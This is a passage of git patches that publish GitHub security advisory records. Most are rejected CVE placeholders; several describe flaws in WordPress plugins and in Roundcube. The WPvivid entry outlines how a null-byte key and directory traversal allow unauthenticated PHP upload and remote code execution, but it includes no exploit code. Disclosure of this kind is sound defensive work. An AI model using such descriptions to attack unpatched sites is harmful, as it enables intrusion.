From 174ef165d4cd83369b44363fe3f57b1b13b8a7de Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 06:32:25 +0000 Subject: [PATCH 001/215] Publish Advisories GHSA-v6c5-9mp4-mwq4 GHSA-263h-vjvc-gp4w GHSA-2hj6-cm2x-fp9h GHSA-3cvp-fw5m-7w6r GHSA-484h-wc5x-5cw9 GHSA-74mh-8gvr-jmhp GHSA-cg9m-x4mp-f79v GHSA-hg78-7cwc-7p26 GHSA-m9ff-h6c5-vghq GHSA-phxq-q7wq-8353 GHSA-pw24-qgf8-7qm8 GHSA-vm49-qx2v-g672 GHSA-x4xg-c2mg-399g GHSA-x6h7-ccw3-wph7 GHSA-xxg6-fj84-6x42 --- .../GHSA-v6c5-9mp4-mwq4.json | 6 +- .../GHSA-263h-vjvc-gp4w.json | 25 +++++++ .../GHSA-2hj6-cm2x-fp9h.json | 25 +++++++ .../GHSA-3cvp-fw5m-7w6r.json | 64 +++++++++++++++++ .../GHSA-484h-wc5x-5cw9.json | 25 +++++++ .../GHSA-74mh-8gvr-jmhp.json | 25 +++++++ .../GHSA-cg9m-x4mp-f79v.json | 25 +++++++ .../GHSA-hg78-7cwc-7p26.json | 25 +++++++ .../GHSA-m9ff-h6c5-vghq.json | 29 ++++++++ .../GHSA-phxq-q7wq-8353.json | 25 +++++++ .../GHSA-pw24-qgf8-7qm8.json | 68 +++++++++++++++++++ .../GHSA-vm49-qx2v-g672.json | 29 ++++++++ .../GHSA-x4xg-c2mg-399g.json | 44 ++++++++++++ .../GHSA-x6h7-ccw3-wph7.json | 25 +++++++ .../GHSA-xxg6-fj84-6x42.json | 25 +++++++ 15 files changed, 464 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-263h-vjvc-gp4w/GHSA-263h-vjvc-gp4w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2hj6-cm2x-fp9h/GHSA-2hj6-cm2x-fp9h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3cvp-fw5m-7w6r/GHSA-3cvp-fw5m-7w6r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-484h-wc5x-5cw9/GHSA-484h-wc5x-5cw9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-74mh-8gvr-jmhp/GHSA-74mh-8gvr-jmhp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cg9m-x4mp-f79v/GHSA-cg9m-x4mp-f79v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hg78-7cwc-7p26/GHSA-hg78-7cwc-7p26.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-phxq-q7wq-8353/GHSA-phxq-q7wq-8353.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pw24-qgf8-7qm8/GHSA-pw24-qgf8-7qm8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x4xg-c2mg-399g/GHSA-x4xg-c2mg-399g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x6h7-ccw3-wph7/GHSA-x6h7-ccw3-wph7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xxg6-fj84-6x42/GHSA-xxg6-fj84-6x42.json diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json index f4702c74bd229..c561cfa14aefd 100644 --- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json +++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v6c5-9mp4-mwq4", - "modified": "2026-02-10T21:31:26Z", + "modified": "2026-02-11T06:30:40Z", "published": "2025-11-26T15:34:12Z", "aliases": [ "CVE-2025-13601" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2485" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2072" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1736" diff --git a/advisories/unreviewed/2026/02/GHSA-263h-vjvc-gp4w/GHSA-263h-vjvc-gp4w.json b/advisories/unreviewed/2026/02/GHSA-263h-vjvc-gp4w/GHSA-263h-vjvc-gp4w.json new file mode 100644 index 0000000000000..206ef0ad73a06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-263h-vjvc-gp4w/GHSA-263h-vjvc-gp4w.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-263h-vjvc-gp4w", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26038" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26038" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2hj6-cm2x-fp9h/GHSA-2hj6-cm2x-fp9h.json b/advisories/unreviewed/2026/02/GHSA-2hj6-cm2x-fp9h/GHSA-2hj6-cm2x-fp9h.json new file mode 100644 index 0000000000000..5af03e813c116 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2hj6-cm2x-fp9h/GHSA-2hj6-cm2x-fp9h.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2hj6-cm2x-fp9h", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26036" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26036" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3cvp-fw5m-7w6r/GHSA-3cvp-fw5m-7w6r.json b/advisories/unreviewed/2026/02/GHSA-3cvp-fw5m-7w6r/GHSA-3cvp-fw5m-7w6r.json new file mode 100644 index 0000000000000..1ab8641395eb9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3cvp-fw5m-7w6r/GHSA-3cvp-fw5m-7w6r.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3cvp-fw5m-7w6r", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-1357" + ], + "details": "The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Upload in versions up to and including 0.9.123. This is due to improper error handling in the RSA decryption process combined with a lack of path sanitization when writing uploaded files. When the plugin fails to decrypt a session key using openssl_private_decrypt(), it does not terminate execution and instead passes the boolean false value to the phpseclib library's AES cipher initialization. The library treats this false value as a string of null bytes, allowing an attacker to encrypt a malicious payload using a predictable null-byte key. Additionally, the plugin accepts filenames from the decrypted payload without sanitization, enabling directory traversal to escape the protected backup directory. This makes it possible for unauthenticated attackers to upload arbitrary PHP files to publicly accessible directories and achieve Remote Code Execution via the wpvivid_action=send_to_site parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1357" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.122/includes/class-wpvivid-crypt.php#L58" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.122/includes/customclass/class-wpvivid-send-to-site.php#L629" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.123/includes/class-wpvivid-crypt.php#L58" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.123/includes/customclass/class-wpvivid-send-to-site.php#L629" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid-crypt.php#L58" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/customclass/class-wpvivid-send-to-site.php#L629" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3448386/wpvivid-backuprestore#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T06:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-484h-wc5x-5cw9/GHSA-484h-wc5x-5cw9.json b/advisories/unreviewed/2026/02/GHSA-484h-wc5x-5cw9/GHSA-484h-wc5x-5cw9.json new file mode 100644 index 0000000000000..0fcda9ee2a757 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-484h-wc5x-5cw9/GHSA-484h-wc5x-5cw9.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-484h-wc5x-5cw9", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26037" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26037" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74mh-8gvr-jmhp/GHSA-74mh-8gvr-jmhp.json b/advisories/unreviewed/2026/02/GHSA-74mh-8gvr-jmhp/GHSA-74mh-8gvr-jmhp.json new file mode 100644 index 0000000000000..65e9167dc7b64 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-74mh-8gvr-jmhp/GHSA-74mh-8gvr-jmhp.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74mh-8gvr-jmhp", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-26042" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26042" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cg9m-x4mp-f79v/GHSA-cg9m-x4mp-f79v.json b/advisories/unreviewed/2026/02/GHSA-cg9m-x4mp-f79v/GHSA-cg9m-x4mp-f79v.json new file mode 100644 index 0000000000000..3b488996ab7f3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cg9m-x4mp-f79v/GHSA-cg9m-x4mp-f79v.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg9m-x4mp-f79v", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-26043" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26043" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hg78-7cwc-7p26/GHSA-hg78-7cwc-7p26.json b/advisories/unreviewed/2026/02/GHSA-hg78-7cwc-7p26/GHSA-hg78-7cwc-7p26.json new file mode 100644 index 0000000000000..8c919c42b7ad3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hg78-7cwc-7p26/GHSA-hg78-7cwc-7p26.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hg78-7cwc-7p26", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26039" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26039" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json b/advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json new file mode 100644 index 0000000000000..fcdabce44d264 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m9ff-h6c5-vghq/GHSA-m9ff-h6c5-vghq.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m9ff-h6c5-vghq", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-1235" + ], + "details": "The WP eCommerce WordPress plugin through 3.15.1 unserializes user input via ajax actions, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1235" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/c7eb234e-3113-40db-a00d-358604d91e3f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T06:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-phxq-q7wq-8353/GHSA-phxq-q7wq-8353.json b/advisories/unreviewed/2026/02/GHSA-phxq-q7wq-8353/GHSA-phxq-q7wq-8353.json new file mode 100644 index 0000000000000..a1e585053744d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phxq-q7wq-8353/GHSA-phxq-q7wq-8353.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phxq-q7wq-8353", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26041" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26041" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pw24-qgf8-7qm8/GHSA-pw24-qgf8-7qm8.json b/advisories/unreviewed/2026/02/GHSA-pw24-qgf8-7qm8/GHSA-pw24-qgf8-7qm8.json new file mode 100644 index 0000000000000..5c12bac79e333 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pw24-qgf8-7qm8/GHSA-pw24-qgf8-7qm8.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pw24-qgf8-7qm8", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-26079" + ], + "details": "Roundcube Webmail before 1.5.13 and 1.6 before 1.6.13 allows Cascading Style Sheets (CSS) injection, e.g., because comments are mishandled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26079" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/1f4c3a5af5033747f9685a8a395dbd8228d19816" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/2b5625f1d2ef7e050fd1ae481b2a52dc35466447" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/53d75d5dfebef235a344d476b900c20c12d52b01" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/5a3315cce587e0be58335d11ff9a5571c90494a5" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/bf89cbaa5897d8ad62e8057d9a3f6babb90b7954" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/commit/c15f5dbf093a497e19a749b20e7f8fb5a9c24cde" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/releases/tag/1.5.13" + }, + { + "type": "WEB", + "url": "https://github.com/roundcube/roundcubemail/releases/tag/1.6.13" + }, + { + "type": "WEB", + "url": "https://roundcube.net/news/2026/02/08/security-updates-1.6.13-and-1.5.13" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json b/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json new file mode 100644 index 0000000000000..e705519ec1c2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm49-qx2v-g672", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2025-15400" + ], + "details": "The Pix para Woocommerce WordPress plugin through 2.13.3 allows any authenticated user to trigger AJAX actions that reset payment gateway configuration options without capability or nonce checks. This permits any authenticated users, such as subscribers to clear API credentials and webhook status, causing persistent disruption of OpenPix payment functionality.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15400" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/54c1251f-96be-4d70-b773-3db26b599838" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x4xg-c2mg-399g/GHSA-x4xg-c2mg-399g.json b/advisories/unreviewed/2026/02/GHSA-x4xg-c2mg-399g/GHSA-x4xg-c2mg-399g.json new file mode 100644 index 0000000000000..5b070bbc55788 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x4xg-c2mg-399g/GHSA-x4xg-c2mg-399g.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x4xg-c2mg-399g", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-1893" + ], + "details": "The Orbisius Random Name Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'btn_label' parameter in the 'orbisius_random_name_generator' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1893" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/orbisius-random-name-generator/tags/1.0.2/orbisius-random-name-generator.php#L112" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3455340%40orbisius-random-name-generator&new=3455340%40orbisius-random-name-generator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/84e6bd88-88d1-4529-86f3-6c73fb47db9b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6h7-ccw3-wph7/GHSA-x6h7-ccw3-wph7.json b/advisories/unreviewed/2026/02/GHSA-x6h7-ccw3-wph7/GHSA-x6h7-ccw3-wph7.json new file mode 100644 index 0000000000000..237f0be2d4219 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6h7-ccw3-wph7/GHSA-x6h7-ccw3-wph7.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6h7-ccw3-wph7", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26040" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26040" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xxg6-fj84-6x42/GHSA-xxg6-fj84-6x42.json b/advisories/unreviewed/2026/02/GHSA-xxg6-fj84-6x42/GHSA-xxg6-fj84-6x42.json new file mode 100644 index 0000000000000..e509217650400 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xxg6-fj84-6x42/GHSA-xxg6-fj84-6x42.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxg6-fj84-6x42", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-26044" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26044" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file From 7dfceb4737c892b4d68f578748da623a5c67461f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 09:31:39 +0000 Subject: [PATCH 002/215] Advisory Database Sync --- .../GHSA-8x3f-4jvw-ww73.json | 38 +++++++---- .../GHSA-27g4-m3jv-cgvm.json | 68 +++++++++++++++++++ .../GHSA-3h85-7292-2f8x.json | 52 ++++++++++++++ .../GHSA-4m3p-4qg3-gvrj.json | 44 ++++++++++++ .../GHSA-4qr9-h3h9-fwcc.json | 48 +++++++++++++ .../GHSA-675f-2vc9-8xg6.json | 48 +++++++++++++ .../GHSA-6j8r-j98h-9g9f.json | 38 +++++++---- .../GHSA-72cf-r449-9974.json | 52 ++++++++++++++ .../GHSA-9598-vp7g-3348.json | 48 +++++++++++++ .../GHSA-9c75-pvwv-54wj.json | 44 ++++++++++++ .../GHSA-c224-wx4m-6qf6.json | 44 ++++++++++++ .../GHSA-h64q-7h2c-3jw5.json | 36 ++++++++++ .../GHSA-hxcf-rpfm-c25q.json | 44 ++++++++++++ .../GHSA-j4hm-cc75-4f7j.json | 36 ++++++++++ .../GHSA-mpvf-vrx7-h74x.json | 40 +++++++++++ .../GHSA-mw6j-4x6g-77v3.json | 36 ++++++++++ .../GHSA-prgq-3hfx-hfpx.json | 52 ++++++++++++++ .../GHSA-r47q-hvhr-7cx6.json | 52 ++++++++++++++ .../GHSA-vpqr-79qg-79p9.json | 48 +++++++++++++ .../GHSA-vw5r-3jjm-rpxq.json | 52 ++++++++++++++ .../GHSA-w569-6xv3-222m.json | 44 ++++++++++++ .../GHSA-w6xg-jvhg-4qqw.json | 44 ++++++++++++ .../GHSA-w848-8gfw-8jhq.json | 52 ++++++++++++++ .../GHSA-wvch-mq77-2vf3.json | 48 +++++++++++++ .../GHSA-x566-frf2-p8rw.json | 2 +- 25 files changed, 1079 insertions(+), 31 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-27g4-m3jv-cgvm/GHSA-27g4-m3jv-cgvm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3h85-7292-2f8x/GHSA-3h85-7292-2f8x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4m3p-4qg3-gvrj/GHSA-4m3p-4qg3-gvrj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4qr9-h3h9-fwcc/GHSA-4qr9-h3h9-fwcc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-675f-2vc9-8xg6/GHSA-675f-2vc9-8xg6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-72cf-r449-9974/GHSA-72cf-r449-9974.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9598-vp7g-3348/GHSA-9598-vp7g-3348.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9c75-pvwv-54wj/GHSA-9c75-pvwv-54wj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c224-wx4m-6qf6/GHSA-c224-wx4m-6qf6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h64q-7h2c-3jw5/GHSA-h64q-7h2c-3jw5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hxcf-rpfm-c25q/GHSA-hxcf-rpfm-c25q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j4hm-cc75-4f7j/GHSA-j4hm-cc75-4f7j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mpvf-vrx7-h74x/GHSA-mpvf-vrx7-h74x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mw6j-4x6g-77v3/GHSA-mw6j-4x6g-77v3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-prgq-3hfx-hfpx/GHSA-prgq-3hfx-hfpx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r47q-hvhr-7cx6/GHSA-r47q-hvhr-7cx6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vpqr-79qg-79p9/GHSA-vpqr-79qg-79p9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vw5r-3jjm-rpxq/GHSA-vw5r-3jjm-rpxq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w569-6xv3-222m/GHSA-w569-6xv3-222m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w6xg-jvhg-4qqw/GHSA-w6xg-jvhg-4qqw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w848-8gfw-8jhq/GHSA-w848-8gfw-8jhq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wvch-mq77-2vf3/GHSA-wvch-mq77-2vf3.json diff --git a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json index 7d5cde419a9b2..808e29db5f926 100644 --- a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json +++ b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8x3f-4jvw-ww73", - "modified": "2026-02-10T15:30:21Z", + "modified": "2026-02-11T09:30:17Z", "published": "2026-01-08T15:31:25Z", "aliases": [ "CVE-2026-0719" @@ -21,35 +21,35 @@ }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:1948" + "url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/477" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2005" + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427906" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2006" + "url": "https://access.redhat.com/security/cve/CVE-2026-0719" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2007" + "url": "https://access.redhat.com/errata/RHSA-2026:2514" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2008" + "url": "https://access.redhat.com/errata/RHSA-2026:2512" }, { "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:2049" + "url": "https://access.redhat.com/errata/RHSA-2026:2402" }, { "type": "WEB", - "url": 